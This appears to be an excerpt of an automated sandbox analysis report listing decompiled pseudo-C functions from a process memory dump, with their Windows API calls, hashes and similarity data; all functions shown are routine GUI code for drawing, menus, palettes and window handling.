0x00448737 0x00448738 0x00448754 0x00448766 0x00448771 0x0044877d 0x00448785 0x0044878d 0x004487af 0x004487af 0x004487b2 0x004487bf 0x004487cb 0x004487d3 0x004487db 0x00000000 0x004487fe 0x00448660 0x00448669 0x0044866c 0x00448676 0x00448677 0x00448679 0x0044867e 0x00448682 0x0044868a 0x0044868e 0x00448691 0x00448696 0x00448697 0x00000000 0x00448697 0x00448809

APIs

ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00448697 ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00448738 SetTextColor.GDI32(00000000,00FFFFFF), ref: 00448785 SetBkColor.GDI32(00000000,00000000), ref: 0044878D BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 004487B2 Part of subcall function 00448610: ImageList_GetBkColor.COMCTL32(00000000,?,00448671,00000000,?), ref: 00448626

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorImageList_$Draw$Text String ID: API String ID: 2027629008-0 Opcode ID: 4094665da36111d1273b04d8056914dd580bcbf9be6dc5764fec73b4cc8f8cb7 Instruction ID: c7ff4466aff230b0ce27f37bc18780dc13651bfdc4d4199a20c36a001531123d Opcode Fuzzy Hash: 4094665da36111d1273b04d8056914dd580bcbf9be6dc5764fec73b4cc8f8cb7 Instruction Fuzzy Hash: F2512D71700114ABDB50FF69DD82F9E37E8AF48704F50005AFA04EB286CA78EC519B69

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%

E00453544(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) { intOrPtr* _v8; intOrPtr _v12; intOrPtr _v16; intOrPtr _v20; short _v22; intOrPtr _v28; struct HWND__* _v32; char _v36; intOrPtr _t55; intOrPtr _t61; intOrPtr _t67; intOrPtr _t68; intOrPtr _t71; intOrPtr _t72; intOrPtr _t74; intOrPtr _t76; intOrPtr _t86; intOrPtr _t88; intOrPtr _t91; void* _t96; intOrPtr _t105; intOrPtr _t133; void* _t135; void* _t138; void* _t139; intOrPtr _t140; _t136 = __esi; _t135 = __edi; _t116 = __ebx; _t138 = _t139; _t140 = _t139 + 0xffffffe0; _push(__ebx); _push(__esi); _v36 = 0; _v8 = __eax; _push(_t138); _push(0x453836); _push( *[fs:eax]); *[fs:eax] = _t140; E00438F48(); if( *((char*)(_v8 + 0x57)) != 0 || *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x358) & 0x00000008) != 0 || *((char*)(_v8 + 0x277)) == 1) { _t55 = *0x462cd4; // 0x423580 E00406740(_t55, &_v36); E0040C11C(_v36, 1); E00404184(); } if(GetCapture() != 0) { SendMessageA(GetCapture(), 0x1f, 0, 0); } ReleaseCapture(); _t61 = *0x466580; // 0x26df470 E00455C64(_t61); _push(_t138); _push(0x453819); _push( *[fs:edx]); *[fs:edx] = _t140; *(_v8 + 0x358) = *(_v8 + 0x358) | 0x00000008; if( *((char*)(_v8 + 0x330)) == 0) { _t105 = *0x466580; // 0x26df470 if( *((char*)(_t105 + 0xd4)) != 0) { E0043F0FC(_v8); E004423D4(_v8); } } _v32 = GetActiveWindow(); _v20 = E0044C924(); _t67 = *0x466584; // 0x26e66a0 _t68 = *0x466584; // 0x26e66a0 E0041A888( *((intOrPtr*)(_t68 + 0x7c)), *((intOrPtr*)(_t67 + 0x78)), 0); _t71 = *0x466584; // 0x26e66a0 *((intOrPtr*)(_t71 + 0x78)) = _v8; _t72 = *0x466584; // 0x26e66a0 _v22 = *(_t72 + 0x44) & 0x0000ffff; _t74 = *0x466584; // 0x26e66a0 E00454B28(_t74, 0); _t76 = *0x466584; // 0x26e66a0 _v28 = *((intOrPtr*)(_t76 + 0x48)); _v16 = E0044CA08(0, _t116, _t135, _t136); _push(_t138); _push(0x4537f7); _push( *[fs:edx]); *[fs:edx] = _t140; E00453454(_v8); _push(_t138); _push(0x453756); _push( *[fs:edx]); *[fs:edx] = _t140; SendMessageA(E004423F8(_v8), 0xb000, 0, 0); *((intOrPtr*)(_v8 + 0x294)) = 0; do { _t86 = *0x466580; // 0x26df470 E00456DA0(_t86, _t135, _t136); _t88 = *0x466580; // 0x26df470 if( *((char*)(_t88 + 0xa4)) == 0) { if( *((intOrPtr*)(_v8 + 0x294)) != 0) { E004533B4(_v8); } } else { *((intOrPtr*)(_v8 + 0x294)) = 2; } _t91 = *((intOrPtr*)(_v8 + 0x294)); } while (_t91 == 0); _v12 = _t91; SendMessageA(E004423F8(_v8), 0xb001, 0, 0); _t96 = E004423F8(_v8); if(_t96 != GetActiveWindow()) { _v32 = 0; } _pop(_t133); *[fs:eax] = _t133; _push(0x45375d); return E0045344C(); } 0x00453544 0x00453544 0x00453544 0x00453545 0x00453547 0x0045354a 0x0045354b 0x0045354e 0x00453551 0x00453556 0x00453557 0x0045355c 0x0045355f 0x00453562 0x0045356e 0x00453597 0x0045359c 0x004535ab 0x004535b0 0x004535b0 0x004535bc 0x004535ca 0x004535ca 0x004535cf 0x004535d4 0x004535d9 0x004535e0 0x004535e1 0x004535e6 0x004535e9 0x004535ef 0x00453600 0x00453602 0x0045360e 0x00453613 0x0045361b 0x0045361b 0x0045360e 0x00453625 0x0045362d 0x00453630 0x00453638 0x00453642 0x00453647 0x0045364f 0x00453652 0x0045365b 0x00453661 0x00453666 0x0045366b 0x00453673 0x0045367d 0x00453682 0x00453683 0x00453688 0x0045368b 0x00453691 0x00453698 0x00453699 0x0045369e 0x004536a1 0x004536b6 0x004536c0 0x004536c6 0x004536c6 0x004536cb 0x004536d0 0x004536dc 0x004536f7 0x004536fc 0x004536fc 0x004536de 0x004536e1 0x004536e1 0x00453704 0x0045370a 0x0045370e 0x00453723 0x0045372b 0x00453739 0x0045373d 0x0045373d 0x00453742 0x00453745 0x00453748 0x00453755

APIs

GetCapture.USER32 ref: 004535B5 GetCapture.USER32 ref: 004535C4 SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004535CA ReleaseCapture.USER32(00000000,00453836), ref: 004535CF GetActiveWindow.USER32 ref: 00453620 SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 004536B6 SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00453723 GetActiveWindow.USER32 ref: 00453732

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release String ID: API String ID: 862346643-0 Opcode ID: 9e28f5377d61abf311c9daef1181d16d300c76bc30cf22954581ec0863c717ce Instruction ID: c71c2c127747cc088a0eefe62a95ea86982853baf425fc74ebc282f5ae4e7b0f Opcode Fuzzy Hash: 9e28f5377d61abf311c9daef1181d16d300c76bc30cf22954581ec0863c717ce Instruction Fuzzy Hash: AA519F70A00244AFDB11EF65C986B5D77F1EF49345F1544BAF804AB3A2EB78AE44CB08

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E00440210(intOrPtr __eax, void* __ebx, void* __ecx, struct HDC__* __edx, void* __esi, void* __eflags, intOrPtr _a4) { intOrPtr _v8; struct HDC__* _v12; int _v16; struct tagRECT _v32; signed int _t68; intOrPtr _t74; intOrPtr _t81; int _t102; void* _t104; void* _t105; intOrPtr _t119; int _t125; void* _t126; void* _t129; _v12 = __edx; _v8 = __eax; *(_v8 + 0x54) = *(_v8 + 0x54) | 0x00000080; _v16 = SaveDC(_v12); _push(_t129); _push(0x440388); _push( *[fs:edx]); *[fs:edx] = _t129 + 0xffffffe4; E00439028(_v12, _a4, __ecx); IntersectClipRect(_v12, 0, 0, *(_v8 + 0x48), *(_v8 + 0x4c)); _t102 = 0; _t125 = 0; if((GetWindowLongA(E004423F8(_v8), 0xffffffec) & 0x00000002) == 0) { _t68 = GetWindowLongA(E004423F8(_v8), 0xfffffff0); __eflags = _t68 & 0x00800000; if((_t68 & 0x00800000) != 0) { _t125 = 3; _t102 = 0xa00f; } } else { _t125 = 0xa; _t102 = 0x200f; } if(_t102 != 0) { SetRect( &_v32, 0, 0, *(_v8 + 0x48), *(_v8 + 0x4c)); DrawEdge(_v12, &_v32, _t125, _t102); E00439028(_v12, _v32.top, _v32.left); IntersectClipRect(_v12, 0, 0, _v32.right - _v32.left, _v32.bottom - _v32.top); } E0043BC9C(_v8, _v12, 0x14, 0); E0043BC9C(_v8, _v12, 0xf, 0); _t74 = *((intOrPtr*)(_v8 + 0x1d0)); if(_t74 == 0) { L12: _pop(_t119); *[fs:eax] = _t119; _push(0x44038f); return RestoreDC(_v12, _v16); } else { _t104 = *((intOrPtr*)(_t74 + 8)) - 1; if(_t104 < 0) { goto L12; } _t105 = _t104 + 1; _t126 = 0; do { _t81 = E0041A80C( *((intOrPtr*)(_v8 + 0x1d0)), _t126); _t138 = *((char*)(_t81 + 0x57)); if( *((char*)(_t81 + 0x57)) != 0) { E00440210(_t81, _t105, *((intOrPtr*)(_t81 + 0x40)), _v12, _t126, _t138, *((intOrPtr*)(_t81 + 0x44))); } _t126 = _t126 + 1; _t105 = _t105 - 1; } while (_t105 != 0); goto L12; } } 0x0044021a 0x0044021d 0x00440223 0x00440232 0x00440237 0x00440238 0x0044023d 0x00440240 0x0044024b 0x00440266 0x0044026b 0x0044026d 0x00440282 0x0044029b 0x004402a0 0x004402a5 0x004402a7 0x004402ac 0x004402ac 0x00440284 0x00440284 0x00440289 0x00440289 0x004402b3 0x004402cb 0x004402da 0x004402e8 0x00440303 0x00440303 0x00440315 0x00440327 0x0044032f 0x00440337 0x0044036d 0x0044036f 0x00440372 0x00440375 0x00440387 0x00440339 0x0044033c 0x0044033f 0x00000000 0x00000000 0x00440341 0x00440342 0x00440344 0x0044034f 0x00440354 0x00440358 0x00440364 0x00440364 0x00440369 0x0044036a 0x0044036a 0x00000000 0x00440344

APIs

SaveDC.GDI32(?), ref: 0044022D Part of subcall function 00439028: GetWindowOrgEx.GDI32(00000000), ref: 00439036 Part of subcall function 00439028: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0043904C IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00440266 GetWindowLongA.USER32 ref: 0044027A GetWindowLongA.USER32 ref: 0044029B SetRect.USER32 ref: 004402CB DrawEdge.USER32(?,?,00000000,00000000), ref: 004402DA IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00440303 RestoreDC.GDI32(?,?), ref: 00440382

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave String ID: API String ID: 2976466617-0 Opcode ID: 4840986328c7cd9c4a77fec9c8fe1af57394d4554ee4a78261ce9734ac6bca01 Instruction ID: 4aa519c723c9a553b380c3e93beb146f7b5c6051756f74ab7ed9f7139ab4c4a9 Opcode Fuzzy Hash: 4840986328c7cd9c4a77fec9c8fe1af57394d4554ee4a78261ce9734ac6bca01 Instruction Fuzzy Hash: D341FC75A00208AFEB10DFD9C985F9EB7F9EF48304F1141A5BA04EB391D678AE41CB54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00456A5C(void* __eax, struct HWND__** __edx) { long _v20; intOrPtr _t17; intOrPtr _t30; void* _t46; void* _t50; struct HWND__** _t51; struct HWND__* _t52; struct HWND__* _t53; void* _t54; DWORD* _t55; _t55 = _t54 + 0xfffffff8; _t51 = __edx; _t50 = __eax; _t46 = 0; _t17 = *((intOrPtr*)(__edx + 4)); if(_t17 < 0x100 || _t17 > 0x109) { L19: return _t46; } else { _t52 = GetCapture(); if(_t52 != 0) { GetWindowThreadProcessId(_t52, _t55); _t11 = _t50 + 0x30; // 0x0 GetWindowThreadProcessId( *_t11, &_v20); if( *_t55 == _v20 && SendMessageA(_t52, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) { _t46 = 1; } goto L19; } _t53 = *_t51; _t2 = _t50 + 0x44; // 0x0 _t30 = *_t2; if(_t30 == 0 || _t53 != *((intOrPtr*)(_t30 + 0x29c))) { L7: if(E004374D8(_t53) == 0 && _t53 != 0) { _t53 = GetParent(_t53); goto L7; } if(_t53 == 0) { _t53 = *_t51; } goto L11; } else { _t53 = E004423F8(_t30); L11: if(IsWindowUnicode(_t53) == 0) { if(SendMessageA(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) { _t46 = 1; } } else { if(SendMessageW(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) { _t46 = 1; } } goto L19; } } } 0x00456a60 0x00456a63 0x00456a65 0x00456a67 0x00456a69 0x00456a71 0x00456b47 0x00456b4f 0x00456a82 0x00456a87 0x00456a8b 0x00456b0e 0x00456b18 0x00456b1c 0x00456b28 0x00456b45 0x00456b45 0x00000000 0x00456b28 0x00456a8d 0x00456a8f 0x00456a8f 0x00456a94 0x00456aaf 0x00456ab8 0x00456aad 0x00000000 0x00456aad 0x00456ac0 0x00456ac2 0x00456ac2 0x00000000 0x00456a9e 0x00456aa3 0x00456ac4 0x00456acc 0x00456b06 0x00456b08 0x00456b08 0x00456ace 0x00456ae7 0x00456ae9 0x00456ae9 0x00456ae7 0x00000000 0x00456acc 0x00456a94

APIs

GetCapture.USER32 ref: 00456A82 IsWindowUnicode.USER32(00000000), ref: 00456AC5 SendMessageW.USER32(00000000,-0000BBEE,00460C02,?), ref: 00456AE0 SendMessageA.USER32(00000000,-0000BBEE,00460C02,?), ref: 00456AFF GetWindowThreadProcessId.USER32(00000000), ref: 00456B0E GetWindowThreadProcessId.USER32(00000000,?), ref: 00456B1C SendMessageA.USER32(00000000,-0000BBEE,00460C02,?), ref: 00456B3C

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$ProcessThread$CaptureUnicode String ID: API String ID: 1994056952-0 Opcode ID: 988f28035e725d6b90499869a6500e627582e695e9a65bec0a14398d4c93cf55 Instruction ID: cf72f3f59c931989ad5c2206f26d5bdc5f1bc31332a3f3f8568b50df8a80e80a Opcode Fuzzy Hash: 988f28035e725d6b90499869a6500e627582e695e9a65bec0a14398d4c93cf55 Instruction Fuzzy Hash: 3E219EB12042486FD620EA69C940F67B3DC9F09316B52843AFE59D3783DB28FC04C729

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 65%

E0042715C(void* __ebx) { struct HDC__* _v8; struct tagPALETTEENTRY _v1000; struct tagPALETTEENTRY _v1004; struct tagPALETTEENTRY _v1032; signed int _v1034; short _v1036; void* _t24; int _t52; intOrPtr _t59; void* _t61; void* _t62; _t61 = _t62; _push(__ebx); _v1036 = 0x300; _v1034 = 0x10; E00402EFC(_t24, __ebx, 0x40, &_v1032); _v8 = GetDC(0); _push(_t61); _push(0x427259); _push( *[fs:eax]); *[fs:eax] = _t62 + 0xfffffbf8; _t52 = GetDeviceCaps(_v8, 0x68); if(_t52 >= 0x10) { GetSystemPaletteEntries(_v8, 0, 8, &_v1032); if(_v1004 != 0xc0c0c0) { GetSystemPaletteEntries(_v8, _t52 - 8, 8, _t61 + (_v1034 & 0x0000ffff) * 4 - 0x424); } else { GetSystemPaletteEntries(_v8, _t52 - 8, 1, &_v1004); GetSystemPaletteEntries(_v8, _t52 - 7, 7, _t61 + (_v1034 & 0x0000ffff) * 4 - 0x420); GetSystemPaletteEntries(_v8, 7, 1, &_v1000); } } _pop(_t59); *[fs:eax] = _t59; _push(0x427260); return ReleaseDC(0, _v8); } 0x0042715d 0x00427165 0x00427166 0x0042716f 0x00427183 0x0042718f 0x00427194 0x00427195 0x0042719a 0x0042719d 0x004271ab 0x004271b0 0x004271c5 0x004271d4 0x0042723b 0x004271d6 0x004271e9 0x00427207 0x0042721b 0x0042721b 0x004271d4 0x00427242 0x00427245 0x00427248 0x00427258

APIs

GetDC.USER32(00000000), ref: 0042718A GetDeviceCaps.GDI32(?,00000068), ref: 004271A6 GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 004271C5 GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 004271E9 GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 00427207 GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0042721B GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0042723B ReleaseDC.USER32 ref: 00427253

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: EntriesPaletteSystem$CapsDeviceRelease String ID: API String ID: 1781840570-0 Opcode ID: e91d54244fb84fac95d03ed3f74244df58bb9bf0f4995b59ae57cf6a99570862 Instruction ID: ce3a1c45e00d95f86b6b4c0876be039325c7f876ce5768e959d2bcb4caf90edf Opcode Fuzzy Hash: e91d54244fb84fac95d03ed3f74244df58bb9bf0f4995b59ae57cf6a99570862 Instruction Fuzzy Hash: A121A6B1A44218EAEB10DBA5CD81FAE73ECEB08704F5104AAF705F71C1D6799E509B38

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%

E0045057C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) { char _v8; char _v12; char _v16; char _v20; void* _t46; void* _t66; void* _t73; struct HMENU__* _t76; struct HMENU__* _t82; intOrPtr _t89; void* _t91; intOrPtr _t93; intOrPtr _t95; intOrPtr _t99; void* _t104; intOrPtr _t112; void* _t127; intOrPtr _t129; void* _t132; _v20 = 0; _t129 = __edx; _t104 = __eax; _push(_t132); _push(0x450790); _push( *[fs:eax]); *[fs:eax] = _t132 + 0xfffffff0; if(__edx == 0) { L7: _t44 = *((intOrPtr*)(_t104 + 0x290)); if( *((intOrPtr*)(_t104 + 0x290)) != 0) { E00433BC8(_t44, 0, 0); } if(( *(_t104 + 0x1c) & 0x00000008) != 0 || _t129 != 0 && ( *(_t129 + 0x1c) & 0x00000008) != 0) { _t129 = 0; } *((intOrPtr*)(_t104 + 0x290)) = _t129; if(_t129 != 0) { E00420738(_t129, _t104); } if(_t129 == 0 || ( *(_t104 + 0x1c) & 0x00000010) == 0 && *((char*)(_t104 + 0x271)) == 3) { _t46 = E004426F4(_t104); __eflags = _t46; if(_t46 != 0) { SetMenu(E004423F8(_t104), 0); } goto L30; } else { if( *((char*)( *((intOrPtr*)(_t104 + 0x290)) + 0x5c)) != 0 || *((char*)(_t104 + 0x277)) == 1) { if(( *(_t104 + 0x1c) & 0x00000010) == 0) { __eflags = *((char*)(_t104 + 0x277)) - 1; if( *((char*)(_t104 + 0x277)) != 1) { _t66 = E004426F4(_t104); __eflags = _t66; if(_t66 != 0) { SetMenu(E004423F8(_t104), 0); } } goto L30; } goto L21; } else { L21: if(E004426F4(_t104) != 0) { _t73 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x290)))) + 0x34))(); _t76 = GetMenu(E004423F8(_t104)); _t154 = _t73 - _t76; if(_t73 != _t76) { _t82 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x290)))) + 0x34))(); SetMenu(E004423F8(_t104), _t82); } E00433BC8(_t129, E004423F8(_t104), _t154); } L30: if( *((char*)(_t104 + 0x276)) != 0) { E00451B54(_t104, 1); } E004504B4(_t104); if( *((intOrPtr*)(_t104 + 0x298)) != 0 && ( *(_t104 + 0x1c) & 0x00000010) != 0 && *((intOrPtr*)(_t104 + 0x30)) != 0) { SetWindowPos(E004423F8(_t104), 0, 0, 0, 0, 0, 0x37); E0043BC9C(_t104, 0, 0x85, 0); E0043BC9C(_t104, 0, 0xf, 0); } _pop(_t112); *[fs:eax] = _t112; _push(0x450797); return E0040473C( &_v20); } } } _t89 = *0x466584; // 0x26e66a0 _t91 = E00454684(_t89) - 1; if(_t91 >= 0) { _v8 = _t91 + 1; _t127 = 0; do { _t93 = *0x466584; // 0x26e66a0 if(_t129 == *((intOrPtr*)(E00454670(_t93, _t127) + 0x290))) { _t95 = *0x466584; // 0x26e66a0 if(_t104 != E00454670(_t95, _t127)) { _v16 = *((intOrPtr*)(_t129 + 8)); _v12 = 0xb; _t99 = *0x462bbc; // 0x423728 E00406740(_t99, &_v20); E0040C158(_t104, _v20, 1, _t127, _t129, 0, &_v16); E00404184(); } } _t127 = _t127 + 1; _t10 = &_v8; *_t10 = _v8 - 1; } while ( *_t10 != 0); } } 0x00450587 0x0045058a 0x0045058c 0x00450590 0x00450591 0x00450596 0x00450599 0x0045059e 0x00450610 0x00450610 0x00450618 0x0045061c 0x0045061c 0x00450625 0x00450631 0x00450631 0x00450633 0x0045063b 0x00450641 0x00450641 0x00450648 0x004506fb 0x00450700 0x00450702 0x0045070e 0x0045070e 0x00000000 0x00450661 0x0045066b 0x0045067a 0x004506d4 0x004506db 0x004506df 0x004506e4 0x004506e6 0x004506f2 0x004506f2 0x004506e6 0x00000000 0x004506db 0x00000000 0x0045067c 0x0045067c 0x00450685 0x00450693 0x004506a0 0x004506a5 0x004506a7 0x004506b1 0x004506bd 0x004506bd 0x004506cd 0x004506cd 0x00450713 0x0045071a 0x00450720 0x00450720 0x00450727 0x00450733 0x00450755 0x00450765 0x00450775 0x00450775 0x0045077c 0x0045077f 0x00450782 0x0045078f 0x0045078f 0x0045066b 0x00450648 0x004505a0 0x004505aa 0x004505ad 0x004505b0 0x004505b3 0x004505b5 0x004505b7 0x004505c7 0x004505cb 0x004505d7 0x004505dc 0x004505df 0x004505ec 0x004505f1 0x00450600 0x00450605 0x00450605 0x004505d7 0x0045060a 0x0045060b 0x0045060b 0x0045060b 0x004505b5

APIs

GetMenu.USER32(00000000), ref: 004506A0 SetMenu.USER32(00000000,00000000), ref: 004506BD SetMenu.USER32(00000000,00000000), ref: 004506F2 SetMenu.USER32(00000000,00000000,00000000,00450790), ref: 0045070E Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772 SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00450755

Strings

(7B , xrefs: 004505EC

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$LoadStringWindow String ID: (7B API String ID: 1738039741-3251261122 Opcode ID: 0ccf8dde2134a50e6ee81cdb3be7b335862480176179d592b1f0e745e2d916bc Instruction ID: 391e45c69739de599930f1571a303692f4f31b01482e4dca29fa4868e8c2a8c8 Opcode Fuzzy Hash: 0ccf8dde2134a50e6ee81cdb3be7b335862480176179d592b1f0e745e2d916bc Instruction Fuzzy Hash: F151AE34A043445BEB24EF39998675B2694AB8430AF0544BFFC059B397CABCDC498B99

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%

E00443BBC(intOrPtr* __eax, void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) { intOrPtr* _v8; void _v12; intOrPtr _v16; int _v24; int _v28; intOrPtr _v32; char _v36; signed int _t81; intOrPtr* _t82; intOrPtr _t93; signed int _t107; signed int _t120; signed char _t121; intOrPtr _t138; intOrPtr _t147; void* _t150; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t120 = __ecx; _v8 = __eax; _t147 = *0x462f14; // 0x466584 *((char*)(_v8 + 0x258)) = 1; _push(_t150); _push(0x443da0); _push( *[fs:edx]); *[fs:edx] = _t150 + 0xffffffe0; E0043AA4C(_v8, __ecx, __ecx, _t147); _v16 = _v16 + 4; E0043BD44(_v8, &_v28); if(E00454628() < *(_v8 + 0x4c) + _v24) { _v24 = E00454628() - *(_v8 + 0x4c); } if(E00454634() < *(_v8 + 0x48) + _v28) { _v28 = E00454634() - *(_v8 + 0x48); } if(E0045461C() > _v28) { _v28 = E0045461C(); } if(E00454610() > _v16) { _v16 = E00454610(); } SetWindowPos(E004423F8(_v8), 0xffffffff, _v28, _v24, *(_v8 + 0x48), *(_v8 + 0x4c), 0x10); if(GetTickCount() - *((intOrPtr*)(_v8 + 0x25c)) <= 0xfa) { _t81 = 0; } else { _t107 = _t120; if(_t107 != 0) { _t107 = *(_t107 - 4); } _t81 = _t107 & 0xffffff00 | _t107 - 0x00000064 < 0x00000000; } if(_t81 != 0 && *0x46255c != 0) { SystemParametersInfoA(0x1016, 0, &_v12, 0); if(_v12 != 0) { SystemParametersInfoA(0x1018, 0, &_v12, 0); if(_v12 == 0) { E0044737C( &_v36); if(_v32 <= _v24) { _t121 = 1; } else { _t121 = 0; } } else { _t121 = 2; } *0x46255c(E004423F8(_v8), 0x64, *(0x462664 + (_t121 & 0x000000ff) * 4) | 0x00040000); } } _t82 = *0x462da4; // 0x466580 E0043F308(_v8, *((intOrPtr*)( *_t82 + 0x30))); ShowWindow(E004423F8(_v8), 4); *((intOrPtr*)( *_v8 + 0x80))(); _pop(_t138); *[fs:eax] = _t138; _push(0x443da7); *((intOrPtr*)(_v8 + 0x25c)) = GetTickCount(); _t93 = _v8; *((char*)(_t93 + 0x258)) = 0; return _t93; } 0x00443bca 0x00443bcb 0x00443bcc 0x00443bcd 0x00443bce 0x00443bd0 0x00443bd3 0x00443bdc 0x00443be5 0x00443be6 0x00443beb 0x00443bee 0x00443bf6 0x00443bfb 0x00443c05 0x00443c1c 0x00443c2b 0x00443c2b 0x00443c40 0x00443c4f 0x00443c4f 0x00443c5c 0x00443c65 0x00443c65 0x00443c72 0x00443c7b 0x00443c7b 0x00443ca1 0x00443cb9 0x00443cce 0x00443cbb 0x00443cbb 0x00443cbf 0x00443cc4 0x00443cc4 0x00443cc9 0x00443cc9 0x00443cd2 0x00443cea 0x00443cf3 0x00443d02 0x00443d0b 0x00443d19 0x00443d24 0x00443d2a 0x00443d26 0x00443d26 0x00443d26 0x00443d0d 0x00443d0d 0x00443d0d 0x00443d47 0x00443d47 0x00443cf3 0x00443d4d 0x00443d5a 0x00443d6a 0x00443d74 0x00443d7c 0x00443d7f 0x00443d82 0x00443d8f 0x00443d95 0x00443d98 0x00443d9f

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00443DA0), ref: 00443CA1 GetTickCount.KERNEL32 ref: 00443CA6 SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00443CEA SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00443D02 AnimateWindow.USER32(00000000,00000064,?), ref: 00443D47 ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00443DA0), ref: 00443D6A Part of subcall function 0044737C: GetCursorPos.USER32(?,?,00443D1E,00001018,00000000,00000000,00000000,00001016,00000000,?,00000000,00000000,000000FF,?,?,?), ref: 00447380 GetTickCount.KERNEL32 ref: 00443D87

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow String ID: API String ID: 3024527889-0 Opcode ID: 0d3a6398bf7448182259ca20921321b585508c4eae7e957dc6a7b0303c0f6ddf Instruction ID: 6ca554415f86ce21c423b390f392124ef01619902e7d0cc64a9ff58f6192d223 Opcode Fuzzy Hash: 0d3a6398bf7448182259ca20921321b585508c4eae7e957dc6a7b0303c0f6ddf Instruction Fuzzy Hash: A4517F70A00105EFEB10DFA9C982A9EB3F5EF45705F2045A6F900EB351D778AE40DB59

Uniqueness

Uniqueness Score: -1.00%

